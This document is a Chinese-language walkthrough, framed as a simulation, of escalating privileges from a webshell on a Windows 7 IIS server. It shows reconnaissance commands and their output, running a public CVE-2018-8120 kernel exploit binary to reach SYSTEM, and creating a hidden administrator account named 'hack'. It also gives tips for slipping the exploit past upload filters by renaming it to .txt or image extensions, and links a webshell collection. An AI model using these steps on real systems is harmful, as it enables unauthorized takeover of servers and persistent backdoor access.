前言
這邊是模擬拿到了一個WebShell的後滲透提權操作
提權過程
首先是看了看一個當前用戶權限,在菜刀中打開cmd:
C:\inetpub\wwwroot\bjgs_v2.1\> whoami
iis apppool\bjgs_v2.1
是一個IIS的普通權限
C:\inetpub\wwwroot\bjgs_v2.1\> net user
\\ 的用戶帳戶
-------------------------------------------------------------------------------
Administrator Guest liuwx
命令運行完畢,但發生一個或多個錯誤。
C:\inetpub\wwwroot\bjgs_v2.1\> net user admin admin /add
發生系統錯誤 5。
拒絕訪問。
C:\inetpub\wwwroot\bjgs_v2.1\>
創建用戶:拒絕訪問,那麼權限還是比較低的!
先是上傳個大馬看看有沒有可讀可寫的目錄:
得到一個目錄:
文件夾:C:\inetpub\wwwroot\bjgs_v2.1 可讀,可寫。
先看看當前主機的信息:
C:\inetpub\wwwroot\bjgs_v2.1\> systeminfo
主機名: LIUWX-PC
OS 名稱: Microsoft Windows 7 旗艦版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 製造商: Microsoft Corporation
OS 配置: 獨立工作站
OS 構件類型: Multiprocessor Free
註冊的所有人: liuwx
註冊的組織:
產品 ID: 00426-292-0000007-85837
初始安裝日期: 2019/4/16, 1:03:42
系統啓動時間: 2019/10/7, 9:39:32
系統製造商: VMware, Inc.
系統型號: VMware Virtual Platform
系統類型: x64-based PC
處理器: 安裝了 2 個處理器。
[01]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz
[02]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目錄: C:\Windows
系統目錄: C:\Windows\system32
啓動設備: \Device\HarddiskVolume1
系統區域設置: zh-cn;中文(中國)
輸入法區域設置: zh-cn;中文(中國)
時區: (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊
物理內存總量: 3,103 MB
可用的物理內存: 1,834 MB
虛擬內存: 最大值: 6,205 MB
虛擬內存: 可用: 4,956 MB
虛擬內存: 使用中: 1,249 MB
頁面文件位置: C:\pagefile.sys
域: WORKGROUP
登錄服務器: 暫缺
修補程序: 安裝了 2 個修補程序。
[01]: KB2534111
[02]: KB976902
網卡: 安裝了 1 個 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
連接名: 本地連接
啓用 DHCP: 是
DHCP 服務器: 192.168.1.1
IP 地址
[01]: 192.168.1.106
[02]: fe80::10d5:df24:e351:af59
C:\inetpub\wwwroot\bjgs_v2.1\>
關鍵信息有:
操作系統是Windows 7 x64
補丁只打了兩個:KB2534111、KB976902
那麼我們就可以上傳*.exe本地溢出提權!
這邊是在Github上找到了一個提權exe: https://github.com/alpha1ab/CVE-2018-8120
CVE-2018-8120 Windows LPE exploit
測試支持: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64 WinXP x32, Win2003 x32,Win2003 x64
原exp不支持xp,2003,當前代碼在原基礎上增加了對這兩個系統的支持
把exe上傳到可讀可寫的目錄:
先是使用exe看了看當前權限:
[*] 磁盤列表 [ C:D: ]
C:\inetpub\wwwroot\bjgs_v2.1\> whoami
iis apppool\bjgs_v2.1
C:\inetpub\wwwroot\bjgs_v2.1\>
C:\inetpub\wwwroot\bjgs_v2.1\> CVE-2018-8120.exe "whoami"
CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 3132!
nt authority\system
C:\inetpub\wwwroot\bjgs_v2.1\>
是一個:nt authority\system系統權限!
提權命令:(創建一個hack用戶並且提升爲管理員組)
CVE-2018-8120.exe "net user hack hack /add"
CVE-2018-8120.exe "net localgroup administrators hack /add"
C:\inetpub\wwwroot\bjgs_v2.1\> net user
\\ 的用戶帳戶
-------------------------------------------------------------------------------
Administrator Guest hack
liuwx
命令運行完畢,但發生一個或多個錯誤。
C:\inetpub\wwwroot\bjgs_v2.1\> net user hack
用戶名 hack
全名
註釋
用戶的註釋
國家/地區代碼 000 (系統默認值)
帳戶啓用 Yes
帳戶到期 從不
上次設置密碼 2019/10/7 11:04:04
密碼到期 2019/11/18 11:04:04
密碼可更改 2019/10/7 11:04:04
需要密碼 Yes
用戶可以更改密碼 Yes
允許的工作站 All
登錄腳本
用戶配置文件
主目錄
上次登錄 從不
可允許的登錄小時數 All
本地組成員 *Administrators
全局組成員 *None
命令成功完成。
提權成功!
番外篇
二進制文件後綴可任意修改
首先我們是有一個二進制文件:CVE-2018-8120.exe
接着把exe後綴改成txt
CVE-2018-8120.txt “whoami”
C:\inetpub\wwwroot\bjgs_v2.1\> CVE-2018-8120.txt "whoami"
CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 2700!
nt authority\system
可以看到,是可以執行的!
一般這種用於不能上傳exe、bat文件,我們就可以吧exe文件修改爲可上傳的後綴文件也能照常運行!
圖片格式也是可以的!
aspx比asp權限大
如果網站支持aspx腳本,那麼有的時候asp的權限比較小,但是上傳了aspx腳本後權限就比asp要大一些!
因爲aspx使用的是.net技術。IIS 中默認不支持,ASPX需要依賴於.net framework …ASP只是腳本語言而已。ASP.NET允許用戶使用IIS建立網絡服務。入侵的時候…asp的木馬一般是guest權限…APSX的木馬一般是users權限…iis6默認以network service身份運行。iis5默認是aspnet ASP.NET,IIS的權限機制非常複雜,對每一層應用,都有不同的權限控制。總之..要求對asp.net開放相應權限,纔可以讓你的網站完成相應的服務。ASP.net程序的訪問權限由ASPNET的權限來決定。ASPNET隸屬於Users組。所以ASPX權限就要高一些…
WebSHELL集合 : https://github.com/tennc/webshell
參考鏈接
